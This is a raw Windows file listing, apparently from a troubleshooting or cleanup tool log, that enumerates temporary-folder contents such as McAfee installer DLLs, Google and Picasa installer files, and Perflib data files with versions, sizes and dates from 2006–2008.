McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
McInst.exe -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\McInst.exe -> McAfee, Inc. [Ver = 2,2,107,0 | Size = 291944 bytes | Modified Date = 1/9/2007 9:04:20 AM | Attr =    ]
C:\WINDOWS\Temp\mcu17.tmp\ -> C:\WINDOWS\Temp\mcu17.tmp\ ->  [Folder | Modified Date = 1/21/2007 9:55:15 PM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcu17.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\mcu19.tmp\ -> C:\WINDOWS\Temp\mcu19.tmp\ ->  [Folder | Modified Date = 1/30/2007 11:44:23 AM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcu19.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\mcu21.tmp\ -> C:\WINDOWS\Temp\mcu21.tmp\ ->  [Folder | Modified Date = 12/24/2006 5:58:08 PM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcu21.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\mcu26.tmp\ -> C:\WINDOWS\Temp\mcu26.tmp\ ->  [Folder | Modified Date = 1/15/2007 7:30:37 PM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcu26.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\mcu3A.tmp\ -> C:\WINDOWS\Temp\mcu3A.tmp\ ->  [Folder | Modified Date = 1/14/2007 10:24:15 PM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcu3A.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\mcu80.tmp\ -> C:\WINDOWS\Temp\mcu80.tmp\ ->  [Folder | Modified Date = 2/8/2007 8:26:02 AM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcu80.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\mcuE.tmp\ -> C:\WINDOWS\Temp\mcuE.tmp\ ->  [Folder | Modified Date = 1/28/2007 8:52:24 PM | Attr =    ]
McAppIns.exe -> C:\WINDOWS\Temp\mcuE.tmp\McAppIns.exe -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 131072 bytes | Modified Date = 1/23/2006 6:55:06 PM | Attr =    ]
C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P\ -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P ->  [Folder | Modified Date = 2/12/2007 9:19:20 PM | Attr =   S]
DMSetup[1].exe -> C:\WINDOWS\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P\DMSetup[1].exe -> McAfee, Inc. [Ver = 1,2,104,0 | Size = 591400 bytes | Modified Date = 2/12/2007 9:46:42 PM | Attr =    ]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\Temp\Temporary Internet Files\Content.IE5\CRSLMR2P\DMSetup[1].exe:Zone.Identifier
C:\WINDOWS\Temp\gis544a5e\ -> C:\WINDOWS\Temp\gis544a5e ->  [Folder | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
ci.dll -> C:\WINDOWS\Temp\gis544a5e\ci.dll -> Google [Ver = 2.0.748.20414.beta | Size = 824320 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
cires_en.dll -> C:\WINDOWS\Temp\gis544a5e\cires_en.dll ->  [Ver =  | Size = 123392 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
npCIDetect9.dll -> C:\WINDOWS\Temp\gis544a5e\npCIDetect9.dll -> Google [Ver = 2.0.748.20414.beta | Size = 82944 bytes | Modified Date = 1/25/2007 9:50:19 PM | Attr =    ]
C:\WINDOWS\Temp\gis6e11b\ -> C:\WINDOWS\Temp\gis6e11b ->  [Folder | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
ci.dll -> C:\WINDOWS\Temp\gis6e11b\ci.dll -> Google [Ver = 2.1.810.31257.beta | Size = 882176 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
cires_en.dll -> C:\WINDOWS\Temp\gis6e11b\cires_en.dll ->  [Ver =  | Size = 124928 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
npCIDetect10.dll -> C:\WINDOWS\Temp\gis6e11b\npCIDetect10.dll -> Google [Ver = 2.1.810.31257.beta | Size = 83968 bytes | Modified Date = 4/10/2007 8:01:29 PM | Attr =    ]
C:\WINDOWS\Temp\gis79cf9\ -> C:\WINDOWS\Temp\gis79cf9 ->  [Folder | Modified Date = 8/21/2007 8:48:28 PM | Attr =    ]
ci.dll -> C:\WINDOWS\Temp\gis79cf9\ci.dll -> Google [Ver = 2.2.940.34809.beta | Size = 908800 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
cires_en.dll -> C:\WINDOWS\Temp\gis79cf9\cires_en.dll ->  [Ver =  | Size = 126464 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
npCIDetect11.dll -> C:\WINDOWS\Temp\gis79cf9\npCIDetect11.dll -> Google [Ver = 2.2.940.34809.beta | Size = 83968 bytes | Modified Date = 8/15/2007 10:05:59 AM | Attr =    ]
C:\WINDOWS\Temp\gisd05dc\ -> C:\WINDOWS\Temp\gisd05dc ->  [Folder | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
ci.dll -> C:\WINDOWS\Temp\gisd05dc\ci.dll -> Google [Ver = 2.0.755.22488.beta | Size = 824320 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
cires_en.dll -> C:\WINDOWS\Temp\gisd05dc\cires_en.dll ->  [Ver =  | Size = 123392 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
npCIDetect9.dll -> C:\WINDOWS\Temp\gisd05dc\npCIDetect9.dll -> Google [Ver = 2.0.755.22488.beta | Size = 82944 bytes | Modified Date = 2/7/2007 4:09:04 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\ -> C:\WINDOWS\Temp\McAfeeInstall (2) ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
CodeRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\CodeRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 210520 bytes | Modified Date = 1/8/2007 1:46:52 PM | Attr =    ]
EulaRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\EulaRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 1254952 bytes | Modified Date = 1/20/2007 9:20:32 AM | Attr =    ]
InstProg.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\InstProg.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 198232 bytes | Modified Date = 1/8/2007 1:46:54 PM | Attr =    ]
L10NRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\L10NRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 26152 bytes | Modified Date = 1/20/2007 9:20:34 AM | Attr =    ]
McBrwsr2.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\McBrwsr2.dll -> McAfee, Inc. [Ver = 7,2,112,0 | Size = 239216 bytes | Modified Date = 1/8/2007 11:46:22 AM | Attr =    ]
McUtil.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\McUtil.dll -> McAfee, Inc. [Ver = 7,2,112,0 | Size = 110704 bytes | Modified Date = 1/8/2007 11:46:18 AM | Attr =    ]
MispLF.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\MispLF.dll -> McAfee, Inc. [Ver = 7,2,112,0 | Size = 231024 bytes | Modified Date = 1/8/2007 11:46:20 AM | Attr =    ]
OEMRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\OEMRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 8232 bytes | Modified Date = 1/20/2007 9:20:02 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mfwchck.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mfwchck.dll -> McAfee, Inc. [Ver = 8.2.154.0 | Size = 271912 bytes | Modified Date = 1/10/2007 1:25:02 PM | Attr =    ]
mpfinst.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mpf\mpfinst.dll -> McAfee Corporation [Ver = 8.2.115.0 | Size = 59432 bytes | Modified Date = 1/15/2007 1:16:06 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
checkmps.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\checkmps.dll -> McAfee, Inc. [Ver = 9.2.128.0 | Size = 176680 bytes | Modified Date = 1/16/2007 3:41:38 PM | Attr =    ]
Uninst.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\mps\Uninst.dll -> Network Associates, Inc. [Ver = 6.1.0.132 | Size = 108080 bytes | Modified Date = 8/4/2006 3:41:08 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
MSADPre.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msad\MSADPre.dll -> McAfee, Inc. [Ver = 2,3,0,6028 | Size = 222760 bytes | Modified Date = 2/8/2007 7:40:16 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mcmscins.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\mcmscins.dll -> McAfee, Inc. [Ver = 7,2,142,0 | Size = 218712 bytes | Modified Date = 1/5/2007 2:21:32 PM | Attr =    ]
mscinres.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msc\mscinres.dll -> McAfee, Inc. [Ver = 7,2,142,0 | Size = 16936 bytes | Modified Date = 1/18/2007 5:39:14 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mcmskins.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\mcmskins.dll -> McAfee Inc. [Ver = 8.2.125.0 | Size = 183888 bytes | Modified Date = 1/17/2007 3:30:22 PM | Attr =    ]
mskres.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\mskres.dll -> McAfee Inc. [Ver = 8.2.125.0 | Size = 51752 bytes | Modified Date = 1/20/2007 5:26:10 PM | Attr =    ]
uninst.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\msk\uninst.dll -> Network Associates, Inc. [Ver = 6.1.0.132 | Size = 108080 bytes | Modified Date = 7/21/2006 8:41:22 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 8:51:49 PM | Attr =    ]
mcvsoins.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\mcvsoins.dll -> McAfee, Inc. [Ver = 11,2,121,0 | Size = 153168 bytes | Modified Date = 1/16/2007 4:03:42 PM | Attr =    ]
uninst.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\uninst.dll -> Network Associates, Inc. [Ver = 6.1.0.132 | Size = 102400 bytes | Modified Date = 3/23/2006 3:41:42 PM | Attr =    ]
vsinsres.dll -> C:\WINDOWS\Temp\McAfeeInstall (2)\Apps\vso\vsinsres.dll -> McAfee, Inc. [Ver = 11,2,121,0 | Size = 75344 bytes | Modified Date = 1/25/2007 4:45:42 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\ -> C:\WINDOWS\Temp\McAfeeInstall (3) ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
CodeRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\CodeRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 210520 bytes | Modified Date = 1/8/2007 1:46:52 PM | Attr =    ]
EulaRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\EulaRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 1254952 bytes | Modified Date = 1/20/2007 9:20:32 AM | Attr =    ]
InstProg.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\InstProg.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 198232 bytes | Modified Date = 1/8/2007 1:46:54 PM | Attr =    ]
L10NRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\L10NRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 26152 bytes | Modified Date = 1/20/2007 9:20:34 AM | Attr =    ]
McBrwsr2.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\McBrwsr2.dll -> McAfee, Inc. [Ver = 7,2,112,0 | Size = 239216 bytes | Modified Date = 1/8/2007 11:46:22 AM | Attr =    ]
McUtil.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\McUtil.dll -> McAfee, Inc. [Ver = 7,2,112,0 | Size = 110704 bytes | Modified Date = 1/8/2007 11:46:18 AM | Attr =    ]
MispLF.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\MispLF.dll -> McAfee, Inc. [Ver = 7,2,112,0 | Size = 231024 bytes | Modified Date = 1/8/2007 11:46:20 AM | Attr =    ]
OEMRes.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\OEMRes.dll -> McAfee, Inc. [Ver = 1,2,105,0 | Size = 8232 bytes | Modified Date = 1/20/2007 9:20:02 AM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mfwchck.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mfwchck.dll -> McAfee, Inc. [Ver = 8.2.154.0 | Size = 271912 bytes | Modified Date = 1/10/2007 1:25:02 PM | Attr =    ]
mpfinst.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mpf\mpfinst.dll -> McAfee Corporation [Ver = 8.2.115.0 | Size = 59432 bytes | Modified Date = 1/15/2007 1:16:06 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
checkmps.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\checkmps.dll -> McAfee, Inc. [Ver = 9.2.128.0 | Size = 176680 bytes | Modified Date = 1/16/2007 3:41:38 PM | Attr =    ]
Uninst.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\mps\Uninst.dll -> Network Associates, Inc. [Ver = 6.1.0.132 | Size = 108080 bytes | Modified Date = 8/4/2006 3:41:08 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
MSADPre.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msad\MSADPre.dll -> McAfee, Inc. [Ver = 2,3,0,6028 | Size = 222760 bytes | Modified Date = 2/8/2007 7:40:16 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mcmscins.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\mcmscins.dll -> McAfee, Inc. [Ver = 7,2,142,0 | Size = 218712 bytes | Modified Date = 1/5/2007 2:21:32 PM | Attr =    ]
mscinres.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msc\mscinres.dll -> McAfee, Inc. [Ver = 7,2,142,0 | Size = 16936 bytes | Modified Date = 1/18/2007 5:39:14 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mcmskins.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\mcmskins.dll -> McAfee Inc. [Ver = 8.2.125.0 | Size = 183888 bytes | Modified Date = 1/17/2007 3:30:22 PM | Attr =    ]
mskres.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\mskres.dll -> McAfee Inc. [Ver = 8.2.125.0 | Size = 51752 bytes | Modified Date = 1/20/2007 5:26:10 PM | Attr =    ]
uninst.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\msk\uninst.dll -> Network Associates, Inc. [Ver = 6.1.0.132 | Size = 108080 bytes | Modified Date = 7/21/2006 8:41:22 PM | Attr =    ]
C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\ -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso ->  [Folder | Modified Date = 2/12/2007 9:05:04 PM | Attr =    ]
mcvsoins.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\mcvsoins.dll -> McAfee, Inc. [Ver = 11,2,121,0 | Size = 153168 bytes | Modified Date = 1/16/2007 4:03:42 PM | Attr =    ]
uninst.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\uninst.dll -> Network Associates, Inc. [Ver = 6.1.0.132 | Size = 102400 bytes | Modified Date = 3/23/2006 3:41:42 PM | Attr =    ]
vsinsres.dll -> C:\WINDOWS\Temp\McAfeeInstall (3)\Apps\vso\vsinsres.dll -> McAfee, Inc. [Ver = 11,2,121,0 | Size = 75344 bytes | Modified Date = 1/25/2007 4:45:42 PM | Attr =    ]
C:\WINDOWS\Temp\mcu17.tmp\ -> C:\WINDOWS\Temp\mcu17.tmp\ ->  [Folder | Modified Date = 1/21/2007 9:55:15 PM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcu17.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcu19.tmp\ -> C:\WINDOWS\Temp\mcu19.tmp\ ->  [Folder | Modified Date = 1/30/2007 11:44:23 AM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcu19.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcu21.tmp\ -> C:\WINDOWS\Temp\mcu21.tmp\ ->  [Folder | Modified Date = 12/24/2006 5:58:08 PM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcu21.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcu26.tmp\ -> C:\WINDOWS\Temp\mcu26.tmp\ ->  [Folder | Modified Date = 1/15/2007 7:30:37 PM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcu26.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcu3A.tmp\ -> C:\WINDOWS\Temp\mcu3A.tmp\ ->  [Folder | Modified Date = 1/14/2007 10:24:15 PM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcu3A.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcu80.tmp\ -> C:\WINDOWS\Temp\mcu80.tmp\ ->  [Folder | Modified Date = 2/8/2007 8:26:02 AM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcu80.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\mcuE.tmp\ -> C:\WINDOWS\Temp\mcuE.tmp\ ->  [Folder | Modified Date = 1/28/2007 8:52:24 PM | Attr =    ]
mcinsres.dll -> C:\WINDOWS\Temp\mcuE.tmp\mcinsres.dll -> McAfee, Inc [Ver = 6, 0, 0, 22 | Size = 33280 bytes | Modified Date = 1/23/2006 6:54:54 PM | Attr =    ]
C:\WINDOWS\Temp\nsb7E.tmp\ -> C:\WINDOWS\Temp\nsb7E.tmp\ ->  [Folder | Modified Date = 10/31/2007 9:08:12 PM | Attr =    ]
NSIS_Picasa.dll -> C:\WINDOWS\Temp\nsb7E.tmp\NSIS_Picasa.dll ->  [Ver =  | Size = 55808 bytes | Modified Date = 10/31/2007 9:08:12 PM | Attr =    ]
C:\WINDOWS\Temp\nsbA5.tmp\ -> C:\WINDOWS\Temp\nsbA5.tmp\ ->  [Folder | Modified Date = 7/28/2007 7:46:58 PM | Attr =    ]
NSIS_Picasa.dll -> C:\WINDOWS\Temp\nsbA5.tmp\NSIS_Picasa.dll ->  [Ver =  | Size = 54784 bytes | Modified Date = 7/28/2007 7:46:45 PM | Attr =    ]
C:\WINDOWS\Temp\nsc90.tmp\ -> C:\WINDOWS\Temp\nsc90.tmp\ ->  [Folder | Modified Date = 9/11/2007 3:09:09 PM | Attr =    ]
NSIS_Picasa.dll -> C:\WINDOWS\Temp\nsc90.tmp\NSIS_Picasa.dll ->  [Ver =  | Size = 55808 bytes | Modified Date = 9/11/2007 3:09:09 PM | Attr =    ]
C:\WINDOWS\Temp\nsiB9.tmp\ -> C:\WINDOWS\Temp\nsiB9.tmp\ ->  [Folder | Modified Date = 4/12/2008 8:39:38 AM | Attr =    ]
NSIS_Picasa.dll -> C:\WINDOWS\Temp\nsiB9.tmp\NSIS_Picasa.dll ->  [Ver =  | Size = 51200 bytes | Modified Date = 4/12/2008 8:39:38 AM | Attr =    ]
C:\WINDOWS\Temp\nst1E.tmp\ -> C:\WINDOWS\Temp\nst1E.tmp\ ->  [Folder | Modified Date = 3/25/2007 7:37:28 PM | Attr =    ]
NSIS_Picasa.dll -> C:\WINDOWS\Temp\nst1E.tmp\NSIS_Picasa.dll ->  [Ver =  | Size = 54784 bytes | Modified Date = 3/25/2007 7:37:19 PM | Attr =    ]
C:\WINDOWS\Temp\ -> C:\WINDOWS\Temp ->  [Folder | Modified Date = 8/24/2008 7:13:36 PM | Attr =    ]
Perflib_Perfdata_14c.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_14c.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 7/4/2008 9:47:59 AM | Attr =    ]
Perflib_Perfdata_154.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_154.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 7/8/2008 10:15:15 AM | Attr =    ]
Perflib_Perfdata_158.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_158.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 7/6/2008 12:05:19 AM | Attr =    ]
Perflib_Perfdata_17c.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_17c.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 7/1/2008 5:30:29 AM | Attr =    ]
Perflib_Perfdata_184.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_184.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/6/2008 3:02:53 PM | Attr =    ]
Perflib_Perfdata_188.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_188.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/7/2008 9:12:25 AM | Attr =    ]
Perflib_Perfdata_190.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_190.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/4/2008 6:57:14 PM | Attr =    ]
Perflib_Perfdata_2ac.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_2ac.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 6/6/2008 8:41:38 PM | Attr =    ]
Perflib_Perfdata_4bc.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_4bc.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/21/2007 9:16:42 PM | Attr =    ]
Perflib_Perfdata_558.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_558.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 6/4/2008 10:48:47 PM | Attr =    ]
Perflib_Perfdata_794.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_794.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/16/2008 4:19:45 PM | Attr =    ]
Perflib_Perfdata_79c.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_79c.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/20/2008 8:05:41 AM | Attr =    ]
Perflib_Perfdata_7ac.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7ac.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/20/2008 10:04:10 PM | Attr =    ]
Perflib_Perfdata_7b0.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7b0.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/21/2008 8:22:02 AM | Attr =    ]
Perflib_Perfdata_7b4.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7b4.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/24/2008 9:23:22 AM | Attr =    ]
Perflib_Perfdata_7c0.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7c0.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 6/5/2008 5:42:38 PM | Attr =    ]
Perflib_Perfdata_7e0.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7e0.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/23/2008 6:46:17 PM | Attr =    ]
Perflib_Perfdata_7e8.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7e8.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 6/5/2008 12:17:50 PM | Attr =    ]
Perflib_Perfdata_7ec.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_7ec.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 8/24/2008 6:34:46 PM | Attr =    ]
Perflib_Perfdata_e24.dat -> C:\WINDOWS\Temp\Perflib_Perfdata_e24.dat ->  [Ver =  | Size = 16384 bytes | Modified Date = 6/14/2007 7:40:09 PM | Attr =    ]
30 C:\WINDOWS\Temp\*.tmp files -> C:\WINDOWS\Temp\*.tmp -> 
C:\WINDOWS\Temp\Cookies\ -> C:\WINDOWS\Temp\Cookies ->  [Folder | Modified Date = 2/12/2007 8:19:27 PM | Attr =  HS]
index.dat -> C:\WINDOWS\Temp\Cookies\index.dat ->  [Ver =  | Size = 32768 bytes | Modified Date = 7/1/2008 10:09:09 AM | Attr =    ]
C:\WINDOWS\Temp\History\History.IE5\ -> C:\WINDOWS\Temp\History\History.IE5\ ->  [Folder | Modified Date = 12/24/2006 5:23:36 PM | Attr =  HS]
index.dat -> C:\WINDOWS\Temp\History\History.IE5\index.dat ->  [Ver =  | Size = 49152 bytes | Modified Date = 7/1/2008 10:09:09 AM | Attr =    ]
